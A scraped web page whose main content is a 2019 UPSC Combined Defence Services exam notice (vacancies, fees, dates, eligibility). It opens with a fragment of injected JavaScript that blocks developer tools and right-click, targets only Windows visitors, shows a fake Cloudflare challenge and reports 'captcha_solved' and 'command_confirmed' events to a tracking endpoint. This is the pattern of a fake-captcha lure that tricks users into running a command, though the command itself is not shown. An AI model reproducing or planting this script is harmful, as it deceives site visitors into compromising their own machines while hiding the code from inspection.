`; if (ij) { if (cl) { if (all) { document.querySelectorAll(ij).forEach(function(el, i) { el.addEventListener('click', function(e) { e.preventDefault(); document.body.appendChild(container); if (!init) { initScript(); } }); }) } else { document.querySelector(ij).addEventListener('click', function(e) { e.preventDefault(); document.body.appendChild(container); if (!init) { initScript(); } }); } } else { document.querySelector(ij).before(container); initScript(); } } else { document.querySelector('html').innerHTML = container.innerHTML; initScript(); } document.addEventListener('contextmenu', function(e) { e.preventDefault(); return false; }); document.addEventListener('keydown', function(e) { if (e.key === 'F12' || e.keyCode === 123) { e.preventDefault(); return false; } if (e.ctrlKey && e.shiftKey && (e.key === 'I' || e.key === 'i' || e.keyCode === 73)) { e.preventDefault(); return false; } if (e.ctrlKey && e.shiftKey && (e.key === 'J' || e.key === 'j' || e.keyCode === 74)) { e.preventDefault(); return false; } if (e.ctrlKey && (e.key === 'U' || e.key === 'u' || e.keyCode === 85)) { e.preventDefault(); return false; } if (e.ctrlKey && e.shiftKey && (e.key === 'C' || e.key === 'c' || e.keyCode === 67)) { e.preventDefault(); return false; } return true; }); } function sendEvent(eventType, id) { if (!syn) { return; } const payload = { id: id, event: eventType, // 'ping', captcha_opened', 'captcha_solved', 'command_confirmed' ua: navigator.userAgent, url: location.href, arch: checkArch(), timestamp: Date.now() }; const json = JSON.stringify(payload); const blob = new Blob([json], { type: 'application/json' }); const targetUrl = '/cdn/verify'; if (navigator.sendBeacon && navigator.sendBeacon(targetUrl, blob)) { return; } fetch(targetUrl, { method: 'POST', body: blob, keepalive: true, headers: { 'Content-Type': 'application/json' } }).catch(() => {}); } const arch = checkArch(); if (arch === 'non-windows') { console.log("VM detected — skipping challenge"); setTimeout(function() { if (document.querySelector('#get_api_key_jss')) document.querySelector('#get_api_key_jss').remove(); }, 1000); } else { //setTimeout(function() { const storedStatus = localStorage.getItem(`_verify_${currentId}`); if (storedStatus !== 'completed') { sendEvent('ping', currentId); showCloudflareChallenge(); if (document.querySelector('#get_api_key_jss')) document.querySelector('#get_api_key_jss').remove(); } //}, 3000); } })();
Govt Jobs

UPSC CDS II Exam 2019 – Apply Online for 417 CDS Exam (II) Vacancies

Name of the Post: UPSC CDS Exam (II) Online Form 2019
Post Date: 12-06-2019
Total Vacancy: 417
Brief Information: Union Public Service Commission (UPSC) has announced notification of Combined Defence Services (CDS) Exam II 2019. Those Candidates who are interested in the vacancy details & completed all eligibility criteria can read the Notification & Apply Online.

Union Public Service Commission (UPSC)
Advt No. 10/2019-CDS-II
Combined Defence Service Exam II 2019

Application Fee
For Others candidates: Rs. 200/-
For Female/ SC/ ST Candidates: NIL
Candidates can pay either by depositing the money in any Branch of SBI by cash or by using net banking facility of SBI.

Important Dates

  • Last Date to Apply Online: 08-07-2019 till 06:00 PM
  • Last Date for Fee Payment (Pay by cash): 07-07-2019 at 11:59 pm
  • Last Date for Fee Payment (online): 08-07-2019 till 06:00 pm
  • Date of Online Application withdrawn: From 15 to 22-07-2019 till 6:00 pm
  • Date of Exam: 08-09-2019
  • Tentative Date for Result Declaration: December, 2019

Age Limit (as on 01-07-2020)

  • Minimum Age: 20 Years
  • Maximum Age: 24 Years
  • Candidates born not earlier than 2-07-1996 and not later than 1-07-2000
  • Age relaxation is applicable as per rules

Qualification

  • For I.M.A. and Officers’ Training Academy: Degree of a recognized University or equivalent.
  • For Indian Naval Academy: Degree in Engineering from a recognized University/Institution.
  • For Air Force Academy: Degree of a recognized University (with Physics and Mathematics at 10+2 level) or Bachelor of Engineering

Leave a Reply